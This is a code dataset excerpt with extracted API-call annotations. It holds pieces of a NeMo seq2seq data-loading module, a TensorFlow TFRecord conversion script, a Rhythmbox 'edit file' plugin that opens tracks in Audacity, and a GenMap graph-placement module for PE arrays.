'concat_sampling_probabilities', [1 / len(datasets)] * len(datasets)
),
global_rank=parallel_state.get_data_parallel_rank(),
world_size=parallel_state.get_data_parallel_world_size(),
)
return dataset
else:
return datasets[0]
def _build_eval_dataset(self, data_cfg):
"""Build the evaluation dataset."""
if data_cfg.global_batch_size > data_cfg.micro_batch_size * parallel_state.get_data_parallel_world_size():
raise ValueError(
f'You are trying to use "implicit gradient accumulation" of {data_cfg.global_batch_size // (data_cfg.micro_batch_size * parallel_state.get_data_parallel_world_size())} in your validation/test datasets. This is not supported. Please set global_batch_size equal to micro_batch_size * data_parallel_world_size.'
)
datasets = []
# Determine if we are using a single dataset or a list of datasets.
is_src_list_config = isinstance(data_cfg.src_file_name, ListConfig)
is_tgt_list_config = isinstance(data_cfg.tgt_file_name, ListConfig)
is_names_list_config = False
if hasattr(data_cfg, "names"):
if isinstance(data_cfg.names, ListConfig):
is_names_list_config = True
if (is_src_list_config and not is_tgt_list_config) or (is_tgt_list_config and not is_src_list_config):
raise ValueError("src_list and tgt_list must both be either a ListConfig or a string. ")
if is_src_list_config:
if len(data_cfg.src_file_name) != len(data_cfg.tgt_file_name):
raise ValueError("src_file_name and tgt_file_name must have the same number of elements. ")
if is_names_list_config and len(data_cfg.names) != len(data_cfg.src_file_name):
raise ValueError(
"If you are providing names for each src/tgt file, they must have the same number of elements."
)
else:
data_cfg.src_file_name = [data_cfg.src_file_name]
data_cfg.tgt_file_name = [data_cfg.tgt_file_name]
for src, tgt in zip(data_cfg.src_file_name, data_cfg.tgt_file_name):
dataset = SequenceToSequenceDataset(
src_file_name=src,
tgt_file_name=tgt,
src_tokenizer=self.tokenizer,
tgt_tokenizer=self.tokenizer,
max_src_seq_length=data_cfg.max_src_seq_length,
max_tgt_seq_length=data_cfg.max_tgt_seq_length,
)
datasets.append(dataset)
return datasets
def build_train_valid_test_datasets(self, stage):
logging.info('Building datasets ...')
if stage != 'test':
self._validation_ds = self._build_eval_dataset(self.cfg.data.validation_ds)
if stage != 'validation':
if hasattr(self.cfg.data, 'test_ds'):
self._test_ds = self._build_eval_dataset(self.cfg.data.test_ds)
if stage == 'validation' or stage == 'test':
return
self._train_ds = self._build_train_dataset(self.cfg.data.train_ds)
logging.info(f'Finished building datasets ...')
def on_train_start(self) -> None:
"""PTL hook used to override DataFetcher with GlobalBatchDataFetcher """
self.trainer.fit_loop._data_fetcher = GlobalBatchDataFetcher()
def on_validation_start(self) -> None:
"""PTL hook used to override DataFetcher with GlobalBatchDataFetcher """
self.trainer.fit_loop.epoch_loop.val_loop._data_fetcher = GlobalBatchDataFetcher()
self.trainer.validate_loop._data_fetcher = GlobalBatchDataFetcher()
def on_test_start(self) -> None:
self.trainer.test_loop._data_fetcher = GlobalBatchDataFetcher()
|
[
"nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher",
"nemo.utils.logging.info",
"apex.transformer.pipeline_parallel.utils.get_num_microbatches",
"torch.isnan",
"nemo.utils.AppState",
"torch.utils.data.DataLoader",
"torch.isinf",
"torch.FloatTensor",
"apex.transformer.parallel_state.get_data_parallel_rank",
"torch.utils.data.distributed.DistributedSampler",
"apex.transformer.parallel_state.get_data_parallel_world_size",
"json.dump",
"nemo.collections.common.metrics.classification_accuracy.ExactStringPerCategoryMatchMetric",
"torch.nn.ModuleList",
"nemo.collections.common.metrics.MetricStringToTorchMetric.keys",
"torch.LongTensor",
"nemo.utils.logging.warning",
"torch.distributed.all_gather_object",
"torch.distributed.barrier",
"nemo.collections.nlp.data.common.sequence_to_sequence_dataset.SequenceToSequenceDataset"
] |
[((1914, 1950), 'torch.nn.ModuleList', 'torch.nn.ModuleList', (['self.val_metric'], {}), '(self.val_metric)\n', (1933, 1950), False, 'import torch\n'), ((5687, 5697), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (5695, 5697), False, 'from nemo.utils import AppState, logging\n'), ((6169, 6179), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (6177, 6179), False, 'from nemo.utils import AppState, logging\n'), ((21856, 21895), 'apex.transformer.parallel_state.get_data_parallel_rank', 'parallel_state.get_data_parallel_rank', ([], {}), '()\n', (21893, 21895), False, 'from apex.transformer import parallel_state\n'), ((21917, 21962), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (21960, 21962), False, 'from apex.transformer import parallel_state\n'), ((21981, 22095), 'torch.utils.data.distributed.DistributedSampler', 'torch.utils.data.distributed.DistributedSampler', (['dataset'], {'num_replicas': 'world_size', 'rank': 'rank', 'shuffle': 'shuffle'}), '(dataset, num_replicas=\n world_size, rank=rank, shuffle=shuffle)\n', (22028, 22095), False, 'import torch\n'), ((23090, 23281), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset'], {'collate_fn': 'dataset.collate_fn', 'sampler': 'sampler', 'batch_size': 'micro_batch_size', 'num_workers': 'num_workers', 'pin_memory': 'pin_memory', 'drop_last': 'drop_last'}), '(dataset, collate_fn=dataset.collate_fn, sampler\n =sampler, batch_size=micro_batch_size, num_workers=num_workers,\n pin_memory=pin_memory, drop_last=drop_last)\n', (23117, 23281), False, 'import torch\n'), ((29813, 29850), 'nemo.utils.logging.info', 'logging.info', (['"""Building datasets ..."""'], {}), "('Building datasets ...')\n", (29825, 29850), False, 'from nemo.utils import AppState, logging\n'), ((30288, 30335), 'nemo.utils.logging.info', 'logging.info', (['f"""Finished building datasets ..."""'], {}), "(f'Finished building datasets ...')\n", (30300, 30335), False, 'from nemo.utils import AppState, logging\n'), ((30502, 30526), 'nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher', 'GlobalBatchDataFetcher', ([], {}), '()\n', (30524, 30526), False, 'from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher\n'), ((30718, 30742), 'nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher', 'GlobalBatchDataFetcher', ([], {}), '()\n', (30740, 30742), False, 'from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher\n'), ((30794, 30818), 'nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher', 'GlobalBatchDataFetcher', ([], {}), '()\n', (30816, 30818), False, 'from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher\n'), ((30904, 30928), 'nemo.collections.nlp.parts.nlp_overrides.GlobalBatchDataFetcher', 'GlobalBatchDataFetcher', ([], {}), '()\n', (30926, 30928), False, 'from nemo.collections.nlp.parts.nlp_overrides import GlobalBatchDataFetcher\n'), ((2123, 2160), 'torch.nn.ModuleList', 'torch.nn.ModuleList', (['self.test_metric'], {}), '(self.test_metric)\n', (2142, 2160), False, 'import torch\n'), ((6707, 6819), 'nemo.utils.logging.warning', 'logging.warning', (['"""No training data found, reconfiguring microbatches based on validation batch sizes."""'], {}), "(\n 'No training data found, reconfiguring microbatches based on validation batch sizes.'\n )\n", (6722, 6819), False, 'from nemo.utils import AppState, logging\n'), ((7516, 7526), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (7524, 7526), False, 'from nemo.utils import AppState, logging\n'), ((10257, 10267), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (10265, 10267), False, 'from nemo.utils import AppState, logging\n'), ((19932, 19960), 'torch.isinf', 'torch.isinf', (['averaged_metric'], {}), '(averaged_metric)\n', (19943, 19960), False, 'import torch\n'), ((19964, 19992), 'torch.isnan', 'torch.isnan', (['averaged_metric'], {}), '(averaged_metric)\n', (19975, 19992), False, 'import torch\n'), ((20018, 20028), 'nemo.utils.AppState', 'AppState', ([], {}), '()\n', (20026, 20028), False, 'from nemo.utils import AppState, logging\n'), ((20929, 20959), 'json.dump', 'json.dump', (['json_output', 'f_json'], {}), '(json_output, f_json)\n', (20938, 20959), False, 'import json\n'), ((22620, 22642), 'apex.transformer.pipeline_parallel.utils.get_num_microbatches', 'get_num_microbatches', ([], {}), '()\n', (22640, 22642), False, 'from apex.transformer.pipeline_parallel.utils import _reconfigure_microbatch_calculator, get_num_microbatches\n'), ((26394, 26626), 'nemo.collections.nlp.data.common.sequence_to_sequence_dataset.SequenceToSequenceDataset', 'SequenceToSequenceDataset', ([], {'src_file_name': 'src', 'tgt_file_name': 'tgt', 'src_tokenizer': 'self.tokenizer', 'tgt_tokenizer': 'self.tokenizer', 'max_src_seq_length': 'data_cfg.max_src_seq_length', 'max_tgt_seq_length': 'data_cfg.max_tgt_seq_length'}), '(src_file_name=src, tgt_file_name=tgt,\n src_tokenizer=self.tokenizer, tgt_tokenizer=self.tokenizer,\n max_src_seq_length=data_cfg.max_src_seq_length, max_tgt_seq_length=\n data_cfg.max_tgt_seq_length)\n', (26419, 26626), False, 'from nemo.collections.nlp.data.common.sequence_to_sequence_dataset import SequenceToSequenceDataset\n'), ((29357, 29589), 'nemo.collections.nlp.data.common.sequence_to_sequence_dataset.SequenceToSequenceDataset', 'SequenceToSequenceDataset', ([], {'src_file_name': 'src', 'tgt_file_name': 'tgt', 'src_tokenizer': 'self.tokenizer', 'tgt_tokenizer': 'self.tokenizer', 'max_src_seq_length': 'data_cfg.max_src_seq_length', 'max_tgt_seq_length': 'data_cfg.max_tgt_seq_length'}), '(src_file_name=src, tgt_file_name=tgt,\n src_tokenizer=self.tokenizer, tgt_tokenizer=self.tokenizer,\n max_src_seq_length=data_cfg.max_src_seq_length, max_tgt_seq_length=\n data_cfg.max_tgt_seq_length)\n', (29382, 29589), False, 'from nemo.collections.nlp.data.common.sequence_to_sequence_dataset import SequenceToSequenceDataset\n'), ((2347, 2405), 'nemo.collections.common.metrics.classification_accuracy.ExactStringPerCategoryMatchMetric', 'ExactStringPerCategoryMatchMetric', (['self.cfg.eval_languages'], {}), '(self.cfg.eval_languages)\n', (2380, 2405), False, 'from nemo.collections.common.metrics.classification_accuracy import ExactStringPerCategoryMatchMetric\n'), ((6001, 6046), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (6044, 6046), False, 'from apex.transformer import parallel_state\n'), ((16549, 16596), 'nemo.utils.logging.info', 'logging.info', (['f"""{mode} {metric_name}: {metric}"""'], {}), "(f'{mode} {metric_name}: {metric}')\n", (16561, 16596), False, 'from nemo.utils import AppState, logging\n'), ((17522, 17702), 'torch.distributed.all_gather_object', 'torch.distributed.all_gather_object', (['gathered_outputs', "[{'preds': x['preds'], 'labels': x['labels'], 'categories': x['categories'],\n 'inputs': x['inputs']} for x in output]"], {}), "(gathered_outputs, [{'preds': x['preds'],\n 'labels': x['labels'], 'categories': x['categories'], 'inputs': x[\n 'inputs']} for x in output])\n", (17557, 17702), False, 'import torch\n'), ((19622, 19649), 'torch.distributed.barrier', 'torch.distributed.barrier', ([], {}), '()\n', (19647, 19649), False, 'import torch\n'), ((27591, 27636), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (27634, 27636), False, 'from apex.transformer import parallel_state\n'), ((6536, 6581), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (6579, 6581), False, 'from apex.transformer import parallel_state\n'), ((7137, 7182), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (7180, 7182), False, 'from apex.transformer import parallel_state\n'), ((7902, 7947), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (7945, 7947), False, 'from apex.transformer import parallel_state\n'), ((9083, 9108), 'torch.FloatTensor', 'torch.FloatTensor', (['[pred]'], {}), '([pred])\n', (9100, 9108), False, 'import torch\n'), ((9145, 9171), 'torch.FloatTensor', 'torch.FloatTensor', (['[label]'], {}), '([label])\n', (9162, 9171), False, 'import torch\n'), ((10643, 10688), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (10686, 10688), False, 'from apex.transformer import parallel_state\n'), ((15985, 16032), 'nemo.utils.logging.info', 'logging.info', (['f"""{mode} {metric_name}: {metric}"""'], {}), "(f'{mode} {metric_name}: {metric}')\n", (15997, 16032), False, 'from nemo.utils import AppState, logging\n'), ((24991, 25036), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (25034, 25036), False, 'from apex.transformer import parallel_state\n'), ((27232, 27271), 'apex.transformer.parallel_state.get_data_parallel_rank', 'parallel_state.get_data_parallel_rank', ([], {}), '()\n', (27269, 27271), False, 'from apex.transformer import parallel_state\n'), ((27300, 27345), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (27343, 27345), False, 'from apex.transformer import parallel_state\n'), ((7792, 7814), 'apex.transformer.pipeline_parallel.utils.get_num_microbatches', 'get_num_microbatches', ([], {}), '()\n', (7812, 7814), False, 'from apex.transformer.pipeline_parallel.utils import _reconfigure_microbatch_calculator, get_num_microbatches\n'), ((9687, 9711), 'torch.LongTensor', 'torch.LongTensor', (['[pred]'], {}), '([pred])\n', (9703, 9711), False, 'import torch\n'), ((9748, 9773), 'torch.LongTensor', 'torch.LongTensor', (['[label]'], {}), '([label])\n', (9764, 9773), False, 'import torch\n'), ((10533, 10555), 'apex.transformer.pipeline_parallel.utils.get_num_microbatches', 'get_num_microbatches', ([], {}), '()\n', (10553, 10555), False, 'from apex.transformer.pipeline_parallel.utils import _reconfigure_microbatch_calculator, get_num_microbatches\n'), ((25417, 25462), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (25460, 25462), False, 'from apex.transformer import parallel_state\n'), ((7728, 7773), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (7771, 7773), False, 'from apex.transformer import parallel_state\n'), ((10469, 10514), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (10512, 10514), False, 'from apex.transformer import parallel_state\n'), ((16370, 16422), 'nemo.utils.logging.info', 'logging.info', (['f"""{mode} {metric_name} lang {k} : {v}"""'], {}), "(f'{mode} {metric_name} lang {k} : {v}')\n", (16382, 16422), False, 'from nemo.utils import AppState, logging\n'), ((2912, 2944), 'nemo.collections.common.metrics.MetricStringToTorchMetric.keys', 'MetricStringToTorchMetric.keys', ([], {}), '()\n', (2942, 2944), False, 'from nemo.collections.common.metrics import MetricStringToTorchMetric\n'), ((25250, 25295), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (25293, 25295), False, 'from apex.transformer import parallel_state\n'), ((27804, 27849), 'apex.transformer.parallel_state.get_data_parallel_world_size', 'parallel_state.get_data_parallel_world_size', ([], {}), '()\n', (27847, 27849), False, 'from apex.transformer import parallel_state\n')]
|
"""
準備用:データセットをTFRecord形式にする
"""
import tensorflow as tf
from absl import flags
from absl import app
from glob import glob
from tensorflow.keras.preprocessing.image import load_img, img_to_array
FLAGS = flags.FLAGS
flags.DEFINE_string('old_image_path', "./datasets/original_data", 'Path to the data folder')
flags.DEFINE_string('new_image_path', "./datasets/remake_data", 'Path to the data folder')
flags.DEFINE_string('test_old_image_path', "./datasets/test_original", 'Path to the data folder')
flags.DEFINE_string('test_new_image_path', "./datasets/test_remake", 'Path to the data folder')
# old_label = [str(0) for i in range(len(old_paths))]
# new_label = [str(1) for i in range(len(new_paths))]
def save_tfrec(paths, name):
images_ds = tf.data.Dataset.from_tensor_slices(paths).map(tf.io.read_file)
tfrec = tf.data.experimental.TFRecordWriter(name + '.tfrec')
tfrec.write(images_ds)
def run_main(argv):
del argv
kwargs = {
'old_path': FLAGS.old_image_path,
'new_path': FLAGS.new_image_path,
'test_old_path': FLAGS.test_old_image_path,
'test_new_path': FLAGS.test_new_image_path,
}
main(**kwargs)
def main(old_path, new_path, test_old_path, test_new_path):
old_paths = glob(old_path + "/image_*")
new_paths = glob(new_path + "/image_*")
test_old_paths = glob(test_old_path + "/image_*")
test_new_paths = glob(test_new_path + "/image_*")
save_tfrec(old_paths, 'old')
save_tfrec(new_paths, 'new')
save_tfrec(test_old_paths, 'test_old')
save_tfrec(test_new_paths, 'test_new')
if __name__ == '__main__':
app.run(run_main)
|
[
"tensorflow.data.Dataset.from_tensor_slices",
"absl.flags.DEFINE_string",
"absl.app.run",
"tensorflow.data.experimental.TFRecordWriter",
"glob.glob"
] |
[((217, 313), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""old_image_path"""', '"""./datasets/original_data"""', '"""Path to the data folder"""'], {}), "('old_image_path', './datasets/original_data',\n 'Path to the data folder')\n", (236, 313), False, 'from absl import flags\n'), ((310, 404), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""new_image_path"""', '"""./datasets/remake_data"""', '"""Path to the data folder"""'], {}), "('new_image_path', './datasets/remake_data',\n 'Path to the data folder')\n", (329, 404), False, 'from absl import flags\n'), ((401, 502), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""test_old_image_path"""', '"""./datasets/test_original"""', '"""Path to the data folder"""'], {}), "('test_old_image_path', './datasets/test_original',\n 'Path to the data folder')\n", (420, 502), False, 'from absl import flags\n'), ((499, 598), 'absl.flags.DEFINE_string', 'flags.DEFINE_string', (['"""test_new_image_path"""', '"""./datasets/test_remake"""', '"""Path to the data folder"""'], {}), "('test_new_image_path', './datasets/test_remake',\n 'Path to the data folder')\n", (518, 598), False, 'from absl import flags\n'), ((827, 879), 'tensorflow.data.experimental.TFRecordWriter', 'tf.data.experimental.TFRecordWriter', (["(name + '.tfrec')"], {}), "(name + '.tfrec')\n", (862, 879), True, 'import tensorflow as tf\n'), ((1248, 1275), 'glob.glob', 'glob', (["(old_path + '/image_*')"], {}), "(old_path + '/image_*')\n", (1252, 1275), False, 'from glob import glob\n'), ((1292, 1319), 'glob.glob', 'glob', (["(new_path + '/image_*')"], {}), "(new_path + '/image_*')\n", (1296, 1319), False, 'from glob import glob\n'), ((1341, 1373), 'glob.glob', 'glob', (["(test_old_path + '/image_*')"], {}), "(test_old_path + '/image_*')\n", (1345, 1373), False, 'from glob import glob\n'), ((1395, 1427), 'glob.glob', 'glob', (["(test_new_path + '/image_*')"], {}), "(test_new_path + '/image_*')\n", (1399, 1427), False, 'from glob import glob\n'), ((1614, 1631), 'absl.app.run', 'app.run', (['run_main'], {}), '(run_main)\n', (1621, 1631), False, 'from absl import app\n'), ((752, 793), 'tensorflow.data.Dataset.from_tensor_slices', 'tf.data.Dataset.from_tensor_slices', (['paths'], {}), '(paths)\n', (786, 793), True, 'import tensorflow as tf\n')]
|
# -*- Mode: python; coding: utf-8; tab-width: 4; indent-tabs-mode: nil; -*-
#
# edit-file.py
#
# Adds an option to edit the file containing the selected track
# to the right click context menu.
# Based on code in
#
# Partly based on code in https://github.com/donaghhorgan/rhythmbox-plugins-open-containing-folder/blob/master/OpenContainingFolder.py
from gi.repository import Gio, GObject, Gtk, Peas, RB
import subprocess
import urllib
class EditFile(GObject.Object, Peas.Activatable):
"""Adds an option to edit the file containing the selected track to
the right click context menu."""
object = GObject.property(type=GObject.Object)
_action = 'edit-file'
_locations = ['browser-popup',
'playlist-popup',
'podcast-episode-popup',
'queue-popup']
def __init__(self):
super(EditFile, self).__init__()
self._app = Gio.Application.get_default()
def edit_file(self, *args):
"""Open the given folder.
Args:
args: Additional arguments. These are ignored.
"""
page = self.object.props.selected_page
selected = page.get_entry_view().get_selected_entries()
try:
selected = page.get_entry_view().get_selected_entries()
if selected:
uri = urllib.parse.unquote(selected[0].get_playback_uri())
print('edit-file plugin: uri==<{}>'.format(uri))
abspath = uri.replace("file://","")
print('edit-file plugin: abspath==<{}>'.format(abspath))
subprocess.Popen(['audacity', abspath])
except:
print('edit-file plugin: Could not edit file')
def do_activate(self):
"""Activate the plugin."""
print('edit-file plugin: Activating')
action = Gio.SimpleAction(name=EditFile._action)
action.connect('activate', self.edit_file)
self._app.add_action(action)
item = Gio.MenuItem()
item.set_label('Edit file')
item.set_detailed_action('app.%s' % EditFile._action)
for location in EditFile._locations:
self._app.add_plugin_menu_item(location,
EditFile._action,
item)
def do_deactivate(self):
"""Deactivate the plugin."""
print('edit-file plugin: Deactivating')
for location in EditFile._locations:
self._app.remove_plugin_menu_item(location,
EditFile._action)
|
[
"gi.repository.Gio.MenuItem",
"subprocess.Popen",
"gi.repository.Gio.Application.get_default",
"gi.repository.GObject.property",
"gi.repository.Gio.SimpleAction"
] |
[((628, 665), 'gi.repository.GObject.property', 'GObject.property', ([], {'type': 'GObject.Object'}), '(type=GObject.Object)\n', (644, 665), False, 'from gi.repository import Gio, GObject, Gtk, Peas, RB\n'), ((926, 955), 'gi.repository.Gio.Application.get_default', 'Gio.Application.get_default', ([], {}), '()\n', (953, 955), False, 'from gi.repository import Gio, GObject, Gtk, Peas, RB\n'), ((1849, 1888), 'gi.repository.Gio.SimpleAction', 'Gio.SimpleAction', ([], {'name': 'EditFile._action'}), '(name=EditFile._action)\n', (1865, 1888), False, 'from gi.repository import Gio, GObject, Gtk, Peas, RB\n'), ((1993, 2007), 'gi.repository.Gio.MenuItem', 'Gio.MenuItem', ([], {}), '()\n', (2005, 2007), False, 'from gi.repository import Gio, GObject, Gtk, Peas, RB\n'), ((1607, 1646), 'subprocess.Popen', 'subprocess.Popen', (["['audacity', abspath]"], {}), "(['audacity', abspath])\n", (1623, 1646), False, 'import subprocess\n')]
|
# This file is part of GenMap and released under the MIT License, see LICENSE.
# Author: <NAME>
import networkx as nx
import random
import math
from multiprocessing import Pool
import multiprocessing as multi
class Placer():
def __init__(self, method, iterations = 50, randomness = "Full"):
""" Initializes this class
Args:
method (str) : initial mapping method
available methods are follows:
1. graphviz (default)
2. tsort
3. random
iterations (int): maximum iteration number for generating a node position.
Default = 50
randomness (str): randomness of rounding.
if it is "Full", then the positions are rounded fully randomly.
if is is "Partial", then partilly randomly.
"""
self.__iterations = iterations
self.__method = method
if not randomness in ["Full", "Partial"]:
raise ValueError("Invalid randomness type: " + randomness)
else:
self.__randomness = randomness
def generate_init_mappings(self, dag, width, height, count, proc_num=multi.cpu_count()):
"""Returns multiple initial mappings.
Args:
dag (networkx DiGraph): data-flow-graph
width (int): PE array width
height (int): PE array height
count (int): try count to generate mappings
Optional:
proc_num (int): the number of process
Default is equal to cpu count
Returns:
list: a list of mappings
"""
if self.__method == "graphviz":
mt_args = [(dag, random.randint(1, width), height) for i in range(count)]
p = Pool(proc_num)
results = p.map(self.mt_wrapper, mt_args)
p.close()
init_mapping = []
init_hashable_mapping = set() # for checking dupulication
for mapping in results:
# remove invalid results
if not mapping is None:
if not mapping.values() in init_hashable_mapping:
init_mapping.append(mapping)
init_hashable_mapping.add(mapping.values())
return init_mapping
elif self.__method == "tsort":
return self.make_random_mappings(dag, width, height, count, 1)
else:
return self.make_random_mappings(dag, width, height, count, 0)
def mt_wrapper(self, args):
return self.make_graphviz_mapping(*args)
def make_graphviz_mapping(self, dag, width, height):
""" Makes nodes position on the PE array.
Args:
dag (networkx DiGraph): data-flow-graph
width (int): PE array width
height (int): PE array height
Returns:
Dictionary: keys are operation label, values are mapped positions of them.
In case of failure, returns None
"""
# validate input dag
if nx.is_directed_acyclic_graph(dag) == False:
raise ValueError("Input data-flow-graph is not DAG")
# check dag size
node_num = len(dag.nodes())
if node_num > width * height:
return None
# enumerate possible rectangles
rect_pattern = [(w, h) for w in range(1, width + 1) for h in range(1, height + 1) if w * h >= node_num]
# graph layout by dot's algorithm
pos = nx.nx_pydot.graphviz_layout(dag, prog="dot")
# normalize coordinates
max_x = max([x for (x, y) in pos.values()])
max_y = max([y for (x, y) in pos.values()])
pos = {v: (x / max_x, y / max_y) for v, (x, y) in pos.items()}
# make sink nodes upper side
pos = {v: (x, 1 - y) for v, (x, y) in pos.items()}
# randomly rotate by 90 deg.
if random.randint(0, 1) == 0:
pos = {v: (y, 1 - x) for v, (x, y) in pos.items()}
# randomly flip x position
if random.randint(0, 1) == 0:
pos = {v: (1 - x, y) for v, (x, y) in pos.items()}
# choose a rectangle pattern
(map_width, map_height) = rect_pattern[random.randint(0, len(rect_pattern) - 1)]
# calculate actual coordinates
pos = {v: ((map_width - 1) * x, (map_height - 1) * y) for v, (x, y) in pos.items()}
# try to rounding the conrdinates
best_mapping_lest = len(pos)
for i in range(self.__iterations):
mapping = {v: self.__coord_rouding((x, y)) for v, (x, y) in pos.items()}
# check duplication
duplicated_node_num = len(list(mapping.values())) - len(set(mapping.values()))
if duplicated_node_num == 0:
# check dependency
# if self.__if_keep_dependency(dag, mapping):
# break
break
elif duplicated_node_num < best_mapping_lest:
best_mapping = mapping
best_mapping_lest = duplicated_node_num
else:
# fail to rouding
# get duplicated nodes
duplicated_nodes = {coord: [v for v in best_mapping.keys() if best_mapping[v] == coord] \
for coord in set(best_mapping.values()) \
if list(best_mapping.values()).count(coord) > 1}
# fix one of nodes which are mapped to same coord
for coord in duplicated_nodes:
duplicated_nodes[coord].pop(\
random.randint(0, len(duplicated_nodes[coord]) - 1))
# sort in order of lest node count
duplicated_nodes = dict(sorted(duplicated_nodes.items(), key=lambda x: - len(x[1])))
# get free coordinates
free_coords = [(x, y) for x in range(map_width) for y in range(map_height)\
if not (x, y) in best_mapping.values()]
for coord, nodes in duplicated_nodes.items():
for v in nodes:
dists = [math.sqrt((x - coord[0]) ** 2 + (y - coord[1]) ** 2) \
for (x, y) in free_coords]
nearest_pos = free_coords[dists.index(min(dists))]
free_coords.remove(nearest_pos)
best_mapping[v] = nearest_pos
return best_mapping
return mapping
@staticmethod
def make_random_mappings(dag, width, height, size, sort_prob = 0.5):
""" Generate random mappings
Args:
dag (networkx DiGraph): data-flow-graph
width (int): PE array width
height (int): PE array height
size (int): The number of mappings to be generated
Option:
sort_prob (float): topological sort probability.
Returns:
list: generated mappings
"""
# validate input dag
if nx.is_directed_acyclic_graph(dag) == False:
raise ValueError("Input data-flow-graph is not DAG")
# check dag size
node_num = len(dag.nodes())
if node_num > width * height:
return None
# enumerate possible rectangles
rect_pattern = [(w, h) for w in range(1, width + 1) for h in range(1, height + 1) if w * h >= node_num]
rtn_list = []
for i in range(size):
if random.random() < sort_prob:
topological_sort_enable = True
else:
topological_sort_enable = False
(map_width, map_height) = rect_pattern[random.randint(0, len(rect_pattern) - 1)]
positions = random.sample([(x, y) for x in range(map_width) for y in range(map_height)], node_num)
if topological_sort_enable:
if random.randint(0, 1) == 0:
origin = (0, 0)
else:
origin = (map_width - 1, 0)
positions = sorted(positions, key=lambda x: \
(x[0] - origin[0])**2 + (x[1] - origin[1]) ** 2)
rtn_list.append({k: v for k, v in zip(list(nx.topological_sort(dag)), positions)})
else:
rtn_list.append({k: v for k, v in zip(dag.nodes(), positions)})
return rtn_list
@staticmethod
def __if_keep_dependency(dag, mapping):
"""Check dependency between operations.
Args:
dag (networkx digraph): data-flow-graph to be mapped
mapping (dict): operation mapping
keys: operation labels
values: PE coordinates where the nodes are mapped
"""
valid = True
for u, v in dag.edges():
if mapping[u][1] > mapping[v][1]:
valid = False
break
return valid
def __coord_rouding(self, coord):
""" Round a float value coordinate to a int value coordinate.
Args:
coord: a list-like coordinate
Return:
a tuple: rounded coordinate
"""
if self.__randomness == "Full":
# Either ceil or floor is used randomly
x_ceil = random.randint(0, 1) == 0
y_ceil = random.randint(0, 1) == 0
elif self.__randomness == "Partial":
# extract after the decimal points
x_dec = coord[0] - int(coord[0])
y_dec = coord[0] - int(coord[0])
# decide ceil or floor depending on the decimal
x_ceil = random.random() < x_dec
y_ceil = random.random() < y_dec
if x_ceil and y_ceil:
return (math.ceil(coord[0]), math.ceil(coord[1]))
elif x_ceil and not y_ceil:
return (math.ceil(coord[0]), math.floor(coord[1]))
elif not x_ceil and y_ceil:
return (math.floor(coord[0]), math.ceil(coord[1]))
else:
return (math.floor(coord[0]), math.floor(coord[1]))
|
[
"random.randint",
"math.sqrt",
"math.ceil",
"math.floor",
"networkx.topological_sort",
"random.random",
"multiprocessing.Pool",
"networkx.nx_pydot.graphviz_layout",
"networkx.is_directed_acyclic_graph",
"multiprocessing.cpu_count"
] |
[((1348, 1365), 'multiprocessing.cpu_count', 'multi.cpu_count', ([], {}), '()\n', (1363, 1365), True, 'import multiprocessing as multi\n'), ((3770, 3814), 'networkx.nx_pydot.graphviz_layout', 'nx.nx_pydot.graphviz_layout', (['dag'], {'prog': '"""dot"""'}), "(dag, prog='dot')\n", (3797, 3814), True, 'import networkx as nx\n'), ((2006, 2020), 'multiprocessing.Pool', 'Pool', (['proc_num'], {}), '(proc_num)\n', (2010, 2020), False, 'from multiprocessing import Pool\n'), ((3327, 3360), 'networkx.is_directed_acyclic_graph', 'nx.is_directed_acyclic_graph', (['dag'], {}), '(dag)\n', (3355, 3360), True, 'import networkx as nx\n'), ((4169, 4189), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (4183, 4189), False, 'import random\n'), ((4306, 4326), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (4320, 4326), False, 'import random\n'), ((7257, 7290), 'networkx.is_directed_acyclic_graph', 'nx.is_directed_acyclic_graph', (['dag'], {}), '(dag)\n', (7285, 7290), True, 'import networkx as nx\n'), ((7711, 7726), 'random.random', 'random.random', ([], {}), '()\n', (7724, 7726), False, 'import random\n'), ((9541, 9561), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (9555, 9561), False, 'import random\n'), ((9588, 9608), 'random.randint', 'random.randint', (['(0)', '(1)'], {}), '(0, 1)\n', (9602, 